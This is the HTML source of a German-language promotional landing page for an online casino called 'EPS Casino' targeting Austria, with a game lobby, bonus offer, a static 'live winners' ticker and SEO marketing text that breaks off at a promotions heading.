<!DOCTYPE html>
<html lang="de-AT" class="scroll-smooth">
<head>
    <meta charset="utf-8"/>
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=5.0" name="viewport"/>
    <title>EPS Casino - Das offizielle EPS Casino Österreich 2026</title>
    <meta content="Erleben Sie das ultimative EPS Casino. Schnelle EPS-Einzahlungen, tausende Premium-Spiele, exklusive Boni und 24/7 Support. Jetzt sicher in Österreich spielen!" name="description"/>
    <link href="https://epscasino.org/" rel="canonical"/>
    <meta content="#07090E" name="theme-color"/>
    
    <!-- Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;500;600;700;800&display=swap" rel="stylesheet">

    <!-- Tailwind CSS -->
    <script src="https://cdn.tailwindcss.com"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    fontFamily: {
                        sans: ['Outfit', 'sans-serif'],
                    },
                    colors: {
                        casino: {
                            bg: '#07090E',
                            surface: '#0C121D',
                            primary: '#00F0FF',
                            secondary: '#8A2BE2',
                            muted: '#8E9BAE',
                            glass: 'rgba(255, 255, 255, 0.03)',
                            glassBorder: 'rgba(255, 255, 255, 0.08)'
                        }
                    },
                    animation: {
                        'marquee': 'marquee 35s linear infinite',
                        'float': 'float 6s ease-in-out infinite',
                        'float-delayed': 'float 6s ease-in-out -3s infinite',
                        'pulse-glow': 'pulse-glow 2s cubic-bezier(0.4, 0, 0.6, 1) infinite',
                    },
                    keyframes: {
                        marquee: {
                            '0%': { transform: 'translateX(0)' },
                            '100%': { transform: 'translateX(-50%)' }
                        },
                        float: {
                            '0%, 100%': { transform: 'translateY(0)' },
                            '50%': { transform: 'translateY(-20px)' }
                        },
                        'pulse-glow': {
                            '0%, 100%': { opacity: 1, filter: 'brightness(1)' },
                            '50%': { opacity: .8, filter: 'brightness(1.3)' },
                        }
                    }
                }
            }
        }
    </script>

    <style>
        body {
            background-color: #07090E;
            color: #FFFFFF;
        }
        
        /* Ambient Glows */
        .ambient-glow {
            position: fixed;
            width: 50vw;
            height: 50vw;
            border-radius: 50%;
            filter: blur(140px);
            z-index: -1;
            opacity: 0.15;
            pointer-events: none;
        }
        .glow-top-left { top: -20%; left: -10%; background: #8A2BE2; }
        .glow-bottom-right { bottom: -20%; right: -10%; background: #00F0FF; }

        /* Glassmorphism Utilities */
        .glass {
            background: rgba(255, 255, 255, 0.02);
            backdrop-filter: blur(16px);
            -webkit-backdrop-filter: blur(16px);
            border: 1px solid rgba(255, 255, 255, 0.06);
        }
        
        .glass-card {
            background: linear-gradient(135deg, rgba(255,255,255,0.05) 0%, rgba(255,255,255,0.01) 100%);
            backdrop-filter: blur(20px);
            border: 1px solid rgba(255,255,255,0.08);
            box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.3);
        }

        .glass-btn {
            background: rgba(255, 255, 255, 0.05);
            border: 1px solid rgba(255, 255, 255, 0.1);
            transition: all 0.3s ease;
        }
        .glass-btn:hover {
            background: rgba(255, 255, 255, 0.1);
            border-color: var(--casino-primary);
        }

        /* Gradient Text */
        .text-gradient {
            background: linear-gradient(to right, #ffffff, #8E9BAE);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
        }
        .text-gradient-primary {
            background: linear-gradient(to right, #00F0FF, #8A2BE2);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        /* Hide Scrollbar */
        .no-scrollbar::-webkit-scrollbar { display: none; }
        .no-scrollbar { -ms-overflow-style: none; scrollbar-width: none; }

        /* Ticker Mask */
        .ticker-mask {
            -webkit-mask-image: linear-gradient(to right, transparent, black 10%, black 90%, transparent);
            mask-image: linear-gradient(to right, transparent, black 10%, black 90%, transparent);
        }
    </style>
</head>
<body class="antialiased selection:bg-casino-primary selection:text-black">

    <!-- Ambient Background -->
    <div class="ambient-glow glow-top-left"></div>
    <div class="ambient-glow glow-bottom-right"></div>

    <!-- Header & Navbar -->
    <header id="navbar" class="fixed top-0 left-0 w-full z-50 transition-all duration-300 border-b border-white/5 bg-casino-bg/40 backdrop-blur-md">
        <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 h-20 flex items-center justify-between">
            <!-- Logo & Hamburger -->
            <div class="flex items-center gap-4">
                <button id="mobile-menu-btn" class="lg:hidden flex flex-col justify-center gap-1.5 w-10 h-10 p-2 z-50">
                    <span class="w-6 h-0.5 bg-white rounded-full transition-all duration-300"></span>
                    <span class="w-6 h-0.5 bg-white rounded-full transition-all duration-300"></span>
                    <span class="w-6 h-0.5 bg-white rounded-full transition-all duration-300"></span>
                </button>
                
                <a href="/" class="flex items-center gap-3 group">
                    <div class="w-10 h-10 rounded-xl bg-gradient-to-br from-casino-primary to-casino-secondary flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.3)] group-hover:shadow-[0_0_25px_rgba(0,240,255,0.5)] transition-all duration-300">
                        <svg class="w-6 h-6 text-black" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2.5" d="M12 2L2 7l10 5 10-5-10-5zM2 17l10 5 10-5M2 12l10 5 10-5"></path>
                        </svg>
                    </div>
                    <span class="text-2xl font-extrabold tracking-tight text-white">EPS Casino</span>
                </a>
            </div>

            <nav class="hidden lg:flex items-center gap-8 font-medium text-sm text-casino-muted">
                <a href="#games" class="hover:text-white transition-colors">🎰 Slots</a>
                <a href="#live" class="hover:text-white transition-colors">🔴 Live Casino</a>
                <a href="#promotions" class="hover:text-white transition-colors">🎁 Aktionen</a>
                <a href="#vip" class="hover:text-white transition-colors">💎 VIP-Programm</a>
            </nav>

            <div class="hidden sm:flex items-center gap-4">
                <a href="#login" class="px-5 py-2.5 rounded-lg font-bold text-sm text-white glass-btn">Einloggen</a>
                <a href="#register" class="px-6 py-2.5 rounded-lg font-bold text-sm bg-gradient-to-r from-casino-primary to-blue-500 text-black shadow-[0_4px_15px_rgba(0,240,255,0.3)] hover:shadow-[0_6px_25px_rgba(0,240,255,0.5)] hover:-translate-y-0.5 transition-all">Registrieren</a>
            </div>
        </div>
    </header>

    <div id="mobile-drawer" class="fixed inset-y-0 left-0 w-full sm:w-80 bg-casino-surface/95 backdrop-blur-xl border-r border-white/10 transform -translate-x-full transition-transform duration-500 ease-in-out z-40 flex flex-col pt-24 px-6 pb-8">
        <nav class="flex flex-col gap-2 flex-grow">
            <a href="#games" class="p-4 text-lg font-semibold text-white border-b border-white/5 hover:text-casino-primary hover:pl-6 transition-all">🎰 Slots</a>
            <a href="#live" class="p-4 text-lg font-semibold text-white border-b border-white/5 hover:text-casino-primary hover:pl-6 transition-all">🔴 Live Casino</a>
            <a href="#promotions" class="p-4 text-lg font-semibold text-white border-b border-white/5 hover:text-casino-primary hover:pl-6 transition-all">🎁 Aktionen</a>
            <a href="#vip" class="p-4 text-lg font-semibold text-white border-b border-white/5 hover:text-casino-primary hover:pl-6 transition-all">💎 VIP-Programm</a>
            <a href="#banking" class="p-4 text-lg font-semibold text-white border-b border-white/5 hover:text-casino-primary hover:pl-6 transition-all">🏦 Kassa (EPS)</a>
        </nav>
        <div class="flex flex-col gap-3 mt-8">
            <a href="#login" class="py-3 rounded-xl font-bold text-center text-white glass-btn">Einloggen</a>
            <a href="#register" class="py-3 rounded-xl font-bold text-center bg-gradient-to-r from-casino-primary to-blue-500 text-black shadow-[0_4px_15px_rgba(0,240,255,0.3)]">Registrieren</a>
        </div>
    </div>

    <main class="pt-28 pb-16">
        
        <!-- Hero Section -->
        <section class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-10 lg:py-20">
            <div class="grid lg:grid-cols-2 gap-12 lg:gap-8 items-center">
                
                <!-- Hero Text -->
                <div class="space-y-8 text-center lg:text-left z-10">
                    <div class="inline-flex items-center gap-2 px-4 py-2 rounded-full bg-casino-primary/10 border border-casino-primary/20 text-casino-primary font-semibold text-sm animate-pulse-glow mx-auto lg:mx-0">
                        <span class="text-lg">🇦🇹</span> Top EPS Casino Österreich
                    </div>
                    
                    <h1 class="text-5xl sm:text-6xl lg:text-7xl font-extrabold tracking-tight leading-tight text-gradient">
                        <span class="text-gradient-primary">EPS Casino</span>
                    </h1>
                    
                    <div class="inline-block px-6 py-3 rounded-xl glass border-l-4 border-casino-primary shadow-[0_0_20px_rgba(0,240,255,0.15)]">
                        <span class="text-2xl font-bold text-white">100% bis zu <span class="text-casino-primary">€4.000 + 350 FS</span></span>
                    </div>

                    <div class="flex flex-wrap items-center justify-center lg:justify-start gap-3 text-sm font-medium text-casino-muted">
                        <span class="flex items-center gap-2 bg-white/5 px-3 py-1.5 rounded-full border border-white/5"><span class="text-green-400">✓</span> Sofortauszahlungen</span>
                        <span class="flex items-center gap-2 bg-white/5 px-3 py-1.5 rounded-full border border-white/5"><span class="text-green-400">✓</span> 24/7 Live Support</span>
                        <span class="flex items-center gap-2 bg-white/5 px-3 py-1.5 rounded-full border border-white/5"><span class="text-green-400">✓</span> Sicheres SSL</span>
                    </div>

                    <div class="flex flex-wrap items-center justify-center lg:justify-start gap-4 pt-4">
                        <a href="#register" class="px-8 py-4 rounded-xl font-bold text-lg bg-gradient-to-r from-casino-primary to-blue-500 text-black shadow-[0_4px_20px_rgba(0,240,255,0.4)] hover:shadow-[0_8px_30px_rgba(0,240,255,0.6)] hover:-translate-y-1 transition-all">Jetzt spielen</a>
                        <a href="#games" class="px-8 py-4 rounded-xl font-bold text-lg text-white glass-btn hover:-translate-y-1 transition-all">Alle Spiele ansehen</a>
                    </div>
                </div>

                <!-- Hero Visual / Floating Stats -->
                <div class="relative hidden lg:flex h-[500px] justify-center items-center w-full z-10">
                    <div class="absolute inset-0 bg-gradient-to-tr from-casino-secondary/20 to-casino-primary/20 blur-3xl rounded-full"></div>
                    
                    <!-- Stat Card 1 -->
                    <div class="absolute top-10 right-0 glass-card p-6 rounded-2xl w-64 animate-float border-t-2 border-t-casino-secondary shadow-[0_20px_40px_rgba(0,0,0,0.5)] z-20">
                        <div class="text-xs font-bold text-casino-muted uppercase tracking-wider mb-2">Gesamter Jackpot-Pool</div>
                        <div class="text-3xl font-extrabold text-gradient-primary">€ 14.204.591</div>
                        <div class="mt-4 w-full h-1.5 bg-white/10 rounded-full overflow-hidden">
                            <div class="h-full bg-casino-secondary w-3/4 rounded-full"></div>
                        </div>
                    </div>

                    <!-- Stat Card 2 -->
                    <div class="absolute bottom-10 left-0 glass-card p-6 rounded-2xl w-64 animate-float-delayed border-b-2 border-b-casino-primary shadow-[0_20px_40px_rgba(0,0,0,0.5)] z-20">
                        <div class="flex justify-between items-start mb-2">
                            <div class="text-xs font-bold text-casino-muted uppercase tracking-wider">Aktive Spieler</div>
                            <span class="relative flex h-3 w-3">
                              <span class="animate-ping absolute inline-flex h-full w-full rounded-full bg-green-400 opacity-75"></span>
                              <span class="relative inline-flex rounded-full h-3 w-3 bg-green-500"></span>
                            </span>
                        </div>
                        <div class="text-4xl font-extrabold text-white">4.291</div>
                        <p class="text-xs text-casino-muted mt-2">Spieler sind gerade online</p>
                    </div>

                    <!-- Center Element -->
                    <div class="relative w-48 h-48 rounded-full border-4 border-white/10 flex items-center justify-center animate-[spin_20s_linear_infinite]">
                        <div class="absolute inset-2 rounded-full border border-dashed border-casino-primary/50"></div>
                        <div class="absolute inset-6 rounded-full border border-casino-secondary/50"></div>
                    </div>
                    <div class="absolute text-6xl drop-shadow-[0_0_15px_rgba(0,240,255,0.5)]">🎰</div>
                </div>
            </div>
        </section>

        <!-- Live Winners Ticker -->
        <div class="w-full border-y border-white/5 bg-white/[0.02] py-4 my-8 overflow-hidden ticker-mask backdrop-blur-sm">
            <div class="flex w-[200%] animate-marquee">
                <!-- Content duplicated for seamless looping -->
                <div class="flex w-1/2 justify-around items-center">
                    <div class="flex items-center gap-3 font-medium text-casino-muted whitespace-nowrap"><span class="text-xl">🔥</span> Spieler <strong class="text-white">Markus_W</strong> hat gerade <span class="text-casino-primary font-bold">€ 4.250</span> bei Book of Dead gewonnen</div>
                    <div class="flex items-center gap-3 font-medium text-casino-muted whitespace-nowrap"><span class="text-xl">🔥</span> Spieler <strong class="text-white">Steffi89</strong> hat gerade <span class="text-casino-primary font-bold">€ 1.120</span> bei Sweet Bonanza gewonnen</div>
                    <div class="flex items-center gap-3 font-medium text-casino-muted whitespace-nowrap"><span class="text-xl">🔥</span> Spieler <strong class="text-white">Alex_AT</strong> hat gerade <span class="text-casino-primary font-bold">€ 8.900</span> beim Roulette gewonnen</div>
                </div>
                <div class="flex w-1/2 justify-around items-center">
                    <div class="flex items-center gap-3 font-medium text-casino-muted whitespace-nowrap"><span class="text-xl">🔥</span> Spieler <strong class="text-white">Markus_W</strong> hat gerade <span class="text-casino-primary font-bold">€ 4.250</span> bei Book of Dead gewonnen</div>
                    <div class="flex items-center gap-3 font-medium text-casino-muted whitespace-nowrap"><span class="text-xl">🔥</span> Spieler <strong class="text-white">Steffi89</strong> hat gerade <span class="text-casino-primary font-bold">€ 1.120</span> bei Sweet Bonanza gewonnen</div>
                    <div class="flex items-center gap-3 font-medium text-casino-muted whitespace-nowrap"><span class="text-xl">🔥</span> Spieler <strong class="text-white">Alex_AT</strong> hat gerade <span class="text-casino-primary font-bold">€ 8.900</span> beim Roulette gewonnen</div>
                </div>
            </div>
        </div>

        <!-- Games Lobby Section -->
        <section id="games" class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-16">
            <div class="flex flex-col md:flex-row md:items-end justify-between gap-6 mb-10">
                <div>
                    <h2 class="text-3xl md:text-4xl font-bold text-white mb-2">Casino Lobby</h2>
                    <p class="text-casino-muted">Entdecken Sie über 4.000 Premium-Spiele</p>
                </div>
                
                <!-- Tab Controls -->
                <div class="glass p-1.5 rounded-xl flex items-center gap-1 overflow-x-auto no-scrollbar">
                    <button class="tab-btn active px-6 py-2.5 rounded-lg font-bold text-sm whitespace-nowrap transition-all bg-casino-primary text-black shadow-[0_0_15px_rgba(0,240,255,0.3)]" data-target="panel-slots">🎰 Spielautomaten</button>
                    <button class="tab-btn px-6 py-2.5 rounded-lg font-bold text-sm text-casino-muted whitespace-nowrap hover:text-white hover:bg-white/5 transition-all" data-target="panel-live">🔴 Live Casino</button>
                    <button class="tab-btn px-6 py-2.5 rounded-lg font-bold text-sm text-casino-muted whitespace-nowrap hover:text-white hover:bg-white/5 transition-all" data-target="panel-table">🃏 Tischspiele</button>
                </div>
            </div>

            <!-- Panel: Slots -->
            <div id="panel-slots" class="tab-content grid grid-cols-2 sm:grid-cols-3 lg:grid-cols-6 gap-4 md:gap-6 animate-[fadeIn_0.4s_ease-out]">
                <!-- Card -->
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-casino-primary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-white/5 to-black/60 group-hover:scale-110 transition-transform duration-500">📖</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4 transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300">Book of Dead</div>
                        <div class="w-12 h-12 rounded-full bg-casino-primary text-black flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.4)] transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300 delay-75">
                            <svg class="w-6 h-6 ml-1" fill="currentColor" viewBox="0 0 20 20"><path d="M4 4l12 6-12 6z"></path></svg>
                        </div>
                    </div>
                </div>
                <!-- Card -->
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-casino-primary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-white/5 to-black/60 group-hover:scale-110 transition-transform duration-500">🍭</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4 transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300">Sweet Bonanza</div>
                        <div class="w-12 h-12 rounded-full bg-casino-primary text-black flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.4)] transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300 delay-75">
                            <svg class="w-6 h-6 ml-1" fill="currentColor" viewBox="0 0 20 20"><path d="M4 4l12 6-12 6z"></path></svg>
                        </div>
                    </div>
                </div>
                <!-- Card -->
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-casino-primary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-white/5 to-black/60 group-hover:scale-110 transition-transform duration-500">⚡</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4 transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300">Gates of Olympus</div>
                        <div class="w-12 h-12 rounded-full bg-casino-primary text-black flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.4)] transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300 delay-75">
                            <svg class="w-6 h-6 ml-1" fill="currentColor" viewBox="0 0 20 20"><path d="M4 4l12 6-12 6z"></path></svg>
                        </div>
                    </div>
                </div>
                <!-- Card -->
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-casino-primary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-white/5 to-black/60 group-hover:scale-110 transition-transform duration-500">🐺</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4 transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300">Wolf Gold</div>
                        <div class="w-12 h-12 rounded-full bg-casino-primary text-black flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.4)] transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300 delay-75">
                            <svg class="w-6 h-6 ml-1" fill="currentColor" viewBox="0 0 20 20"><path d="M4 4l12 6-12 6z"></path></svg>
                        </div>
                    </div>
                </div>
                <!-- Card -->
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-casino-primary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-white/5 to-black/60 group-hover:scale-110 transition-transform duration-500">🐟</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4 transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300">Big Bass Splash</div>
                        <div class="w-12 h-12 rounded-full bg-casino-primary text-black flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.4)] transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300 delay-75">
                            <svg class="w-6 h-6 ml-1" fill="currentColor" viewBox="0 0 20 20"><path d="M4 4l12 6-12 6z"></path></svg>
                        </div>
                    </div>
                </div>
                <!-- Card -->
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-casino-primary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-white/5 to-black/60 group-hover:scale-110 transition-transform duration-500">💎</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4 transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300">Starburst</div>
                        <div class="w-12 h-12 rounded-full bg-casino-primary text-black flex items-center justify-center shadow-[0_0_15px_rgba(0,240,255,0.4)] transform translate-y-4 group-hover:translate-y-0 transition-transform duration-300 delay-75">
                            <svg class="w-6 h-6 ml-1" fill="currentColor" viewBox="0 0 20 20"><path d="M4 4l12 6-12 6z"></path></svg>
                        </div>
                    </div>
                </div>
            </div>

            <!-- Panel: Live (Hidden by default) -->
            <div id="panel-live" class="tab-content hidden grid grid-cols-2 sm:grid-cols-3 lg:grid-cols-4 gap-4 md:gap-6 animate-[fadeIn_0.4s_ease-out]">
                <div class="group relative aspect-video lg:aspect-[4/3] rounded-xl overflow-hidden glass hover:border-casino-secondary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-casino-secondary/20 to-black/80 group-hover:scale-110 transition-transform duration-500">🎡</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4">Crazy Time Live</div>
                        <button class="px-5 py-2 text-sm rounded-lg bg-gradient-to-r from-casino-primary to-blue-500 text-black font-bold">Jetzt Spielen</button>
                    </div>
                </div>
                <div class="group relative aspect-video lg:aspect-[4/3] rounded-xl overflow-hidden glass hover:border-casino-secondary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-casino-secondary/20 to-black/80 group-hover:scale-110 transition-transform duration-500">⚡</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4">Lightning Roulette</div>
                        <button class="px-5 py-2 text-sm rounded-lg bg-gradient-to-r from-casino-primary to-blue-500 text-black font-bold">Jetzt Spielen</button>
                    </div>
                </div>
                <div class="group relative aspect-video lg:aspect-[4/3] rounded-xl overflow-hidden glass hover:border-casino-secondary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-casino-secondary/20 to-black/80 group-hover:scale-110 transition-transform duration-500">♠️</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4">VIP Blackjack</div>
                        <button class="px-5 py-2 text-sm rounded-lg bg-gradient-to-r from-casino-primary to-blue-500 text-black font-bold">Jetzt Spielen</button>
                    </div>
                </div>
                <div class="group relative aspect-video lg:aspect-[4/3] rounded-xl overflow-hidden glass hover:border-casino-secondary transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-casino-secondary/20 to-black/80 group-hover:scale-110 transition-transform duration-500">👔</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4">Monopoly Live</div>
                        <button class="px-5 py-2 text-sm rounded-lg bg-gradient-to-r from-casino-primary to-blue-500 text-black font-bold">Jetzt Spielen</button>
                    </div>
                </div>
            </div>

            <!-- Panel: Table (Hidden by default) -->
            <div id="panel-table" class="tab-content hidden grid grid-cols-2 sm:grid-cols-3 lg:grid-cols-6 gap-4 md:gap-6 animate-[fadeIn_0.4s_ease-out]">
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-white/50 transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-green-900/30 to-black/80 group-hover:scale-110 transition-transform duration-500">🃏</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4">European Roulette</div>
                        <button class="px-4 py-2 text-sm rounded-lg glass-btn text-white font-bold">Spielen</button>
                    </div>
                </div>
                <div class="group relative aspect-[3/4] rounded-xl overflow-hidden glass hover:border-white/50 transition-all duration-300 hover:-translate-y-2 cursor-pointer shadow-lg">
                    <div class="absolute inset-0 flex items-center justify-center text-6xl bg-gradient-to-b from-red-900/30 to-black/80 group-hover:scale-110 transition-transform duration-500">♦️</div>
                    <div class="absolute inset-0 bg-casino-bg/80 backdrop-blur-sm opacity-0 group-hover:opacity-100 flex flex-col items-center justify-center transition-all duration-300 p-4">
                        <div class="font-bold text-center text-white mb-4">Classic Baccarat</div>
                        <button class="px-4 py-2 text-sm rounded-lg glass-btn text-white font-bold">Spielen</button>
                    </div>
                </div>
            </div>
            
            <div class="text-center mt-12">
                <a href="#all-games" class="inline-block px-8 py-3 rounded-full font-bold text-white glass-btn">Alle 4.000+ Spiele anzeigen</a>
            </div>
        </section>

        <!-- SEO Content Area -->
        <section class="max-w-5xl mx-auto px-4 sm:px-6 lg:px-8 py-16">
            <article class="glass-card rounded-3xl p-8 md:p-12 relative overflow-hidden">
                <!-- Background decoration for the article -->
                <div class="absolute top-0 right-0 w-64 h-64 bg-casino-primary/5 rounded-full blur-3xl"></div>
                <div class="absolute bottom-0 left-0 w-64 h-64 bg-casino-secondary/5 rounded-full blur-3xl"></div>
                
                <div class="relative z-10 prose prose-invert prose-lg max-w-none">
                    <h2 class="text-3xl font-extrabold text-white mb-6">Warum Sie das EPS Casino für Ihr Spielerlebnis 2026 wählen sollten</h2>
                    <p class="text-casino-muted leading-relaxed mb-6">Willkommen auf der offiziellen Seite vom <strong>EPS Casino</strong>, Ihrer ultimativen Destination für sicheres, spannendes und profitables Online-Glücksspiel in Österreich. Wir wissen genau, was österreichische Spieler erwarten: höchste Sicherheitsstandards, eine reibungslose Benutzererfahrung und eine Spielauswahl, die keine Wünsche offenlässt. Im Jahr 2026 setzen wir neue Maßstäbe für erstklassige Casino-Unterhaltung direkt von Ihrem Bildschirm aus.</p>
                    
                    <ul class="space-y-4 mb-8 text-casino-muted">
                        <li class="flex gap-3"><span class="text-casino-primary">✓</span> <strong>Blitzschnelle und sichere Transaktionen:</strong> Dank der perfekten Integration der österreichischen EPS-Überweisung garantieren wir, dass Ihre Ein- und Auszahlungen in Sekundenschnelle und mit maximaler Bankensicherheit abgewickelt werden.</li>
                        <li class="flex gap-3"><span class="text-casino-primary">✓</span> <strong>Überragende Spielauswahl:</strong> Mit tausenden von Spielen arbeiten wir mit den besten Spieleentwicklern der Branche zusammen, um Ihnen grenzenlose Vielfalt und gigantische Gewinnchancen zu liefern.</li>
                        <li class="flex gap-3"><span class="text-casino-primary">✓</span> <strong>24/7 Premium Support:</strong> Unser engagiertes, deutschsprachiges Support-Team steht Ihnen rund um die Uhr zur Verfügung, um alle Ihre Anliegen freundlich und effizient zu lösen.</li>
                    </ul>

                    <h2 class="text-2xl font-bold text-white mt-10 mb-4">Unsere faszinierende Spielewelt: Für jeden Geschmack das Richtige</h2>
                    <p class="text-casino-muted leading-relaxed mb-6">Im EPS Casino sind wir stolz darauf, unseren Spielern ein unvergleichliches und ständig wachsendes Portfolio anbieten zu können.</p>

                    <h3 class="text-xl font-bold text-white mt-8 mb-3">Premium Spielautomaten (Slots)</h3>
                    <p class="text-casino-muted leading-relaxed mb-6">Entdecken Sie bei uns eine Welt voller hochmoderner Video-Slots. Ob Sie nostalgische Früchte-Automaten, epische Abenteuer mit Megaways-Mechanik oder progressive Jackpots mit lebensverändernden Gewinnsummen suchen – unsere Spielautomaten-Lobby bietet alles, was das Herz begehrt. Wir bringen Ihnen stets die neuesten Blockbuster-Hits des Jahres 2026 direkt auf Ihren PC oder Ihr Smartphone.</p>

                    <h3 class="text-xl font-bold text-white mt-8 mb-3">Das authentische Live Casino Erlebnis</h3>
                    <p class="text-casino-muted leading-relaxed mb-6">Bringen Sie den echten Glamour von Las Vegas direkt in Ihr Wohnzimmer. In unserem Live Casino spielen Sie gegen professionelle, reale Croupiers. Genießen Sie Live-Roulette, spannendes Live-Blackjack und interaktive Game-Shows in brillanter HD-Qualität. Über den Live-Chat können Sie sich in Echtzeit mit Dealern und Mitspielern austauschen.</p>

                    <h3 class="text-xl font-bold text-white mt-8 mb-3">Klassische Tischspiele</h3>
                    <p class="text-casino-muted leading-relaxed mb-8">Für die Taktiker und Strategen unter Ihnen bieten wir eine exquisite Auswahl an klassischen RNG-Tischspielen. Von Baccarat bis hin zu verschiedensten Poker-Varianten – bei uns im EPS Casino können Sie Ihre Strategien in Ihrem eigenen Tempo perfektionieren.</p>

                    <h2 class="text-2xl font-bold text-white mt-10 mb-4">Exklusive Promotionen und der EPS Casino VIP-Club</h2>
